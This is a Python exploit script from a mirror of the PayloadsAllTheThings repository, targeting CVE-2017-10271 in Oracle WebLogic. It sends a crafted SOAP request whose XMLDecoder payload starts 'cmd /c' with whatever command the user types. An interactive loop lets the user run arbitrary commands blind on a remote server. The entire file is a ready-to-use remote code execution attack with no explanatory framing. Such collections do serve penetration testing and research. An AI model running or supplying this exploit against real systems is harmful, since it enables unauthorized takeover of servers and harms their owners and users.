mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
63 lines
2.7 KiB
Python
63 lines
2.7 KiB
Python
from __future__ import print_function
|
|
from builtins import input
|
|
import requests
|
|
import sys
|
|
|
|
url_in = sys.argv[1]
|
|
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
|
|
payload_header = {'content-type': 'text/xml'}
|
|
|
|
|
|
def payload_command (command_in):
|
|
html_escape_table = {
|
|
"&": "&",
|
|
'"': """,
|
|
"'": "'",
|
|
">": ">",
|
|
"<": "<",
|
|
}
|
|
command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
|
|
payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
|
|
" <soapenv:Header> " \
|
|
" <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
|
|
" <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
|
|
" <void class=\"java.lang.ProcessBuilder\"> \n" \
|
|
" <array class=\"java.lang.String\" length=\"3\">" \
|
|
" <void index = \"0\"> " \
|
|
" <string>cmd</string> " \
|
|
" </void> " \
|
|
" <void index = \"1\"> " \
|
|
" <string>/c</string> " \
|
|
" </void> " \
|
|
" <void index = \"2\"> " \
|
|
+ command_filtered + \
|
|
" </void> " \
|
|
" </array>" \
|
|
" <void method=\"start\"/>" \
|
|
" </void>" \
|
|
" </java>" \
|
|
" </work:WorkContext>" \
|
|
" </soapenv:Header>" \
|
|
" <soapenv:Body/>" \
|
|
"</soapenv:Envelope>"
|
|
return payload_1
|
|
|
|
def do_post(command_in):
|
|
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
|
|
|
|
if result.status_code == 500:
|
|
print("Command Executed \n")
|
|
else:
|
|
print("Something Went Wrong \n")
|
|
|
|
|
|
|
|
print("***************************************************** \n" \
|
|
"**************** Coded By 1337g ****************** \n" \
|
|
"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
|
|
"***************************************************** \n")
|
|
|
|
while 1:
|
|
command_in = input("Eneter your command here: ")
|
|
if command_in == "exit" : exit(0)
|
|
do_post(command_in)
|